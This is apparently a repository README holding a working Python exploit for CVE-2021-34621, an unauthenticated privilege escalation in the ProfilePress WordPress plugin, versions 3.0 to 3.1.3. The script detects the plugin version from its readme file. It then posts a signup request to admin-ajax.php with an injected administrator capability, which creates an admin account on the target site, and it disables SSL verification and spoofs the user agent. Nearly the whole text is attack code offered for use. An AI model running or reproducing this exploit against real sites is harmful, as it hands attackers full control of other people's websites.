README.md
Rendering markdown...
import argparse
import re
import requests
import os
#
# Exploit script by @RandomRobbieBF
#
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
# Ignore bad SSL and set proxy
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Set a real user agent
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}
def extract_stable_tag(wp_url):
readme_url = wp_url + '/wp-content/plugins/wp-user-avatar/readme.txt'
response = requests.get(readme_url, verify=False,headers=headers)
if response.status_code == 200:
readme_content = response.text
stable_tag_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', readme_content)
if stable_tag_match:
stable_tag = stable_tag_match.group(1)
return stable_tag
return None
def main():
parser = argparse.ArgumentParser(description='CVE-2021-34621 - ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation')
parser.add_argument('--url', required=True, help='WordPress URL')
parser.add_argument('--username', required=True, help='Username')
parser.add_argument('--email', required=True, help='Email')
parser.add_argument('--password', required=True, help='Password')
args = parser.parse_args()
stable_tag = extract_stable_tag(args.url)
if stable_tag and '3.0' <= stable_tag <= '3.1.3':
payload = {
'reg_username': args.username,
'reg_email': args.email,
'reg_password': args.password,
'reg_password_present': 'true',
'reg_first_name': 'test',
'reg_last_name': 'test',
'wp_capabilities[administrator]': '1',
'action': 'pp_ajax_signup',
'melange_id': ''
}
response = requests.post(args.url + '/wp-admin/admin-ajax.php', data=payload, verify=False,headers=headers)
if response.status_code == 200:
print(response.text)
else:
print('Error:', response.status_code)
else:
print('Stable tag is not within the specified range (3.0 - 3.1.3)')
if __name__ == '__main__':
main()